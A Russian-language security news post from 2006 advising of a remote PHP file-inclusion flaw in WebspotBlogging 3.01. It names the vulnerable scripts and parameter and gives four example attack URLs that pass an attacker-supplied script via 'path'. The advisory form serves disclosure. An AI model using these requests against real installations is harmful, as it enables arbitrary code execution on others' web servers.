PHP-инклюдинг в WebspotBlogging - 11 Июня 2006 - Программирование, защита систем, сайтов.Новости, статьи
Пятница
12/Ноя/2010, 12:44:33
ExCode
Приветствую Вас Гость | RSS
Главная Регистрация Вход
Категории раздела
Уязвимости [139]
Уязвимости в сервисах, программах, системах
Безопасность [41]
Разработки ПО [15]
Разное [88]
Вирусы/Трояны [69]
Железо [21]
Пираты / Хакеры / Аресты [21]
Здесь публикуются новости о каких либо проблемах с законом в сфере IT .

Наш опрос
Зарабатывайте вместе с UcoZ!
Какой ОС Вы пользуетесь

[ Результаты · Архив опросов ]

Всего ответов: 294

Главная » 2006 » Июнь » 11 » PHP-инклюдинг в WebspotBlogging
PHP-инклюдинг в WebspotBlogging
15:10:44

Программа: WebspotBlogging 3.01, возможно другие версии.

Опасность: Высокая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "path" в сценариях /inc/logincheck.inc.php, /inc/adminheader.inc.php, /inc/global.php и /inc/mainheader.inc.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

http://victim/[Webspotblogging_path]/inc/logincheck.inc.php?path=[evil_scripts]
http://victim/[Webspotblogging_path]/inc/adminheader.inc.php?path=[evil_scripts]
http://victim/[Webspotblogging_path]/inc/global.php?path=[evil_scripts]
http://victim/[Webspotblogging_path]/inc/mainheader.inc.php?path=[evil_scripts]

URL производителя: blogging.webspot.co.uk

Решение: Способов устранения уязвимости не существует в настоящее время.

Категория: Уязвимости | Просмотров: 295 | Добавил: BlackMage
Всего комментариев: 0
Имя *:
Email:
Код *:
-->
Форма входа
E-mail:
Пароль:

Поиск

Календарь
«  Июнь 2006  »
ПнВтСрЧтПтСбВс
   1234
567891011
12131415161718
19202122232425
2627282930

Архив записей

Друзья сайта
  • Создать сайт
  • Все для веб-мастера
  • Программы для всех
  • Блокнот программиста

  • Статистика

    Онлайн всего: 5
    Гостей: 5
    Пользователей: 0


    Copyright Veon © 2006-2009